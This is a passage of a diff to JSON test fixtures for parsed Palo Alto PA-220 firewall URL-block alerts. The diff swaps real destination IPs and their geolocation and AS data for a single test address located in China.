"1:b3MpSidntZseAvCtO89765ETlyI=" + "1:YhRsCDiztXE3cQjKOdwAryGZjyI=", + "1:2B3KDgrQ/ZoQIB3taLKfajXpk6Y=" ], "transport": "tcp", "application": "ssl", @@ -5137,14 +5197,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768048951Z", - "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691820Z", + "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -5167,26 +5227,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5202,14 +5264,14 @@ "port": 53022, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -5224,7 +5286,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:wug3mTERsDOMF1R52vDi6SpWbMc=" + "community_id": "1:aRZdUQvYlLZFrlb7FLXpZAYGfVI=" } }, "threat_category": "unknown", @@ -5269,8 +5331,8 @@ ], "network": { "community_id": [ - "1:39KkS/Y1cEc0OLIWR3+26TPoFhQ=", - "1:wug3mTERsDOMF1R52vDi6SpWbMc=" + "1:BAGriF5s1csL/VlVgarVgTrQNTw=", + "1:aRZdUQvYlLZFrlb7FLXpZAYGfVI=" ], "transport": "tcp", "application": "ssl", @@ -5309,14 +5371,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768052923Z", - "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691826300Z", + "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -5339,26 +5401,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5374,14 +5438,14 @@ "port": 53023, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -5396,7 +5460,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:ktdKYACJa2q76tdS55sj5QaeMBs=" + "community_id": "1:9JWJBlFbim2f2OICXHWgHHii6q4=" } }, "threat_category": "unknown", @@ -5441,8 +5505,8 @@ ], "network": { "community_id": [ - "1:IFLzwMkLmz8UfCYPFfRgTIBIzSI=", - "1:ktdKYACJa2q76tdS55sj5QaeMBs=" + "1:ttfpme4pbkQ5E2nFXYrZVqA+aZY=", + "1:9JWJBlFbim2f2OICXHWgHHii6q4=" ], "transport": "tcp", "application": "ssl", @@ -5481,14 +5545,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768056840Z", - "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691832800Z", + "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -5511,26 +5575,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5546,14 +5612,14 @@ "port": 53024, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -5568,7 +5634,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:sWvGFBOOisURcvYe5nB5HUSa6B8=" + "community_id": "1:Vj0ncZbiWrNwetDfc4ldV/QmVpA=" } }, "threat_category": "unknown", @@ -5613,8 +5679,8 @@ ], "network": { "community_id": [ - "1:spPQtp0F92JeXKXtvGndU6vymNo=", - "1:sWvGFBOOisURcvYe5nB5HUSa6B8=" + "1:f10dPKu04WLfR0Y2pmXGZ8O/2UI=", + "1:Vj0ncZbiWrNwetDfc4ldV/QmVpA=" ], "transport": "tcp", "application": "ssl", @@ -5653,14 +5719,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768060783Z", - "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691839300Z", + "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -5683,26 +5749,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5718,14 +5786,14 @@ "port": 53025, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -5740,7 +5808,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:LHZawFx+zgZPTd01rJqX/31kNmE=" + "community_id": "1:KptNUPxZMb3gPTIXS6Sjj5oM7aM=" } }, "threat_category": "unknown", @@ -5785,8 +5853,8 @@ ], "network": { "community_id": [ - "1:xBwOt7zrEs9oyuV1oEHKLKXdg1Q=", - "1:LHZawFx+zgZPTd01rJqX/31kNmE=" + "1:8HL74AAev4o2qF0UiITHmvOh/B4=", + "1:KptNUPxZMb3gPTIXS6Sjj5oM7aM=" ], "transport": "tcp", "application": "ssl", @@ -5825,14 +5893,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768064729Z", - "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691845600Z", + "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -5855,26 +5923,28 @@ "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 15133, + "number": 4837, "organization": { - "name": "MCI Communications Services, Inc. d/b/a Verizon Business" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -5890,14 +5960,14 @@ "port": 53026, "ip": "192.168.15.224" }, - "message": "192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "152.195.55.192" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -5912,7 +5982,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:XcghkvaiKIQS/KgINx7Mb5Vvn3M=" + "community_id": "1:OXaDfs1yeGdJJKApbFP+T+Gd65c=" } }, "threat_category": "unknown", @@ -5957,8 +6027,8 @@ ], "network": { "community_id": [ - "1:z5jHjldbSP1U0TqDWR9Uox2k3Js=", - "1:XcghkvaiKIQS/KgINx7Mb5Vvn3M=" + "1:RkWNOdn0i8fkKzeJPYWl3p6lgaE=", + "1:OXaDfs1yeGdJJKApbFP+T+Gd65c=" ], "transport": "tcp", "application": "ssl", @@ -5997,14 +6067,14 @@ ], "ip": [ "192.168.15.224", - "152.195.55.192", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768068899Z", - "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691852100Z", + "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -6027,26 +6097,28 @@ "destination": { "nat": { "port": 443, - "ip": "151.101.2.2" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 54113, + "number": 4837, "organization": { - "name": "Fastly" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "151.101.2.2" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6062,14 +6134,14 @@ "port": 53041, "ip": "192.168.15.224" }, - "message": "192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,\"cdn.taboola.com/\",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,\"cdn.taboola.com/\",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "151.101.2.2" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -6084,7 +6156,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:XdO4yHx+1HZM4GcutRTyur9ixdM=" + "community_id": "1:QuW2mKBVd/fGyGz7iVybGH8VU7c=" } }, "threat_category": "unknown", @@ -6129,8 +6201,8 @@ ], "network": { "community_id": [ - "1:tQxUFWF1PJh9XS+U53oZgNQELoA=", - "1:XdO4yHx+1HZM4GcutRTyur9ixdM=" + "1:qjyk/WSSoSLvg7t9MnFFd+phtoQ=", + "1:QuW2mKBVd/fGyGz7iVybGH8VU7c=" ], "transport": "tcp", "application": "ssl", @@ -6169,14 +6241,14 @@ ], "ip": [ "192.168.15.224", - "151.101.2.2", + "175.16.199.1", "192.168.1.63" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:39:10.768101095Z", - "original": "Nov 30 16:44:53 PA-220 1,2018/11/30 16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,151.101.2.2,192.168.1.63,151.101.2.2,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,\"cdn.taboola.com/\",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "ingested": "2021-12-09T13:43:44.691858600Z", + "original": "Nov 30 16:44:53 PA-220 1,2018/11/30 16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,\"cdn.taboola.com/\",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:53.000-05:00", "timezone": "America/New_York", "kind": "alert", @@ -6199,29 +6271,28 @@ "destination": { "nat": { "port": 443, - "ip": "54.192.7.152" + "ip": "175.16.199.1" }, "geo": { - "continent_name": "North America", - "region_iso_code": "US-WA", - "city_name": "Seattle", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Washington", + "region_name": "Jilin", "location": { - "lon": -122.3303, - "lat": 47.6109 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 16509, + "number": 4837, "organization": { - "name": "Amazon.com, Inc." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "54.192.7.152" + "ip": "175.16.199.1" }, "rule": { "name": "new_outbound_from_trust" @@ -6237,14 +6308,14 @@ "port": 53040, "ip": "192.168.15.224" }, - "message": "192.168.15.224,54.192.7.152,192.168.1.63,54.192.7.152,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,\"rules.quantcount.com/\",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", + "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,\"rules.quantcount.com/\",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "panw": { "panos": { "payload_protocol_id": "0", "destination": { "nat": { "port": 443, - "ip": "54.192.7.152" + "ip": "175.16.199.1" } }, "repeat_count": 1, @@ -6259,7 +6330,7 @@ "url_idx": "0", "network": { "nat": { - "community_id": "1:kCzU3MoZUMh7VlhTewngoP1twbw=" + "community_id": "1:vEVgzoaf3bFxNSHxElyZGdPv0tk=" } }, "threat_category": "unknown", @@ -6304,8 +6375,8 @@ ], "network": { "community_id": [ - 